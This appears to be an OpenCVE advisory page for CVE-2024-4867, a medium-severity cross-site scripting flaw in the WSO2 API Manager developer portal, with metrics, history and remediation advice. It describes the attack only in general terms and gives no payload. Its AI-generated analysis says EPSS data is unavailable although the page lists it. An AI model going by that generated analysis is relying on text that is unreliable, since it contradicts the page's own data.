Description
The WSO2 API Manager developer portal accepts user-supplied input without enforcing expected validation constraints or proper output encoding. This deficiency allows a malicious actor to inject script content that is executed within the context of a user's browser.

By leveraging this cross-site scripting vulnerability, a malicious actor can cause the browser to redirect to a malicious website, make changes to the UI of the web page, or retrieve information from the browser. However, session hijacking is not possible as all session-related sensitive cookies are protected by the httpOnly flag.
Published: 2026-04-16
Score: 5.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑Site Scripting that permits malicious script injection, UI manipulation, and information retrieval in the user’s browser
Action: Patch
AI Analysis

Impact

The vulnerability stems from the WSO2 API Manager developer portal’s failure to enforce proper validation and output encoding on user‑supplied input. Injected script content executes within the victim’s browser context, enabling attackers to redirect the browser, modify the portal’s user interface, or extract data visible to the browser. Cookie protection via the httpOnly flag prevents direct session hijacking, so the attacker’s impact is limited to what can be accessed or manipulated through client‑side scripting.

Affected Systems

WSO2 API Manager is the affected vendor and product. No specific version information is available in the advisory, so all releases of the API Manager product should be considered at risk until a patch is applied.

Risk and Exploitability

The CVSS score of 5.4 indicates a medium severity. EPSS information is not available, and the vulnerability is not listed in the CISA KEV catalog. Attackers can exploit this via any public interface that accepts user input on the developer portal, such as input fields, comments, or custom content. Because session cookies are httpOnly, an attacker cannot hijack sessions, but they can still perform actions confined to the victim’s browser context and access data exposed within that context.

Generated by OpenCVE AI on April 17, 2026 at 03:27 UTC.

Remediation

Vendor Solution

Follow the instructions given on https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3391/#solution

OpenCVE Recommended Actions

  • Apply the vendor‑supplied patch following the instructions in the WSO2 security advisory.
  • Enforce strict validation and sanitization of all user‑supplied input before it is rendered to the browser in the developer portal.
  • Deploy a robust Content Security Policy that restricts script sources and prevents execution of injected scripts.

Generated by OpenCVE AI on April 17, 2026 at 03:27 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 16 Apr 2026 13:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 16 Apr 2026 11:45:00 +0000

Type Values Removed Values Added
First Time appeared Wso2
Wso2 wso2 Api Manager
Vendors & Products Wso2
Wso2 wso2 Api Manager

Thu, 16 Apr 2026 10:15:00 +0000

Type Values Removed Values Added
Description The WSO2 API Manager developer portal accepts user-supplied input without enforcing expected validation constraints or proper output encoding. This deficiency allows a malicious actor to inject script content that is executed within the context of a user's browser. By leveraging this cross-site scripting vulnerability, a malicious actor can cause the browser to redirect to a malicious website, make changes to the UI of the web page, or retrieve information from the browser. However, session hijacking is not possible as all session-related sensitive cookies are protected by the httpOnly flag.
Title Cross-Site Scripting via Developer Portal in WSO2 API Manager Enables UI Modification and Information Retrieval
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Subscriptions

Wso2 Wso2 Api Manager
cve-icon MITRE

Status: PUBLISHED

Assigner: WSO2

Published:

Updated: 2026-04-16T12:30:42.568Z

Reserved: 2024-05-14T12:13:06.529Z

Link: CVE-2024-4867

cve-icon Vulnrichment

Updated: 2026-04-16T12:20:03.408Z

cve-icon NVD

Status : Awaiting Analysis

Published: 2026-04-16T10:16:13.893

Modified: 2026-04-17T15:38:09.243

Link: CVE-2024-4867

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-17T03:30:08Z

Weaknesses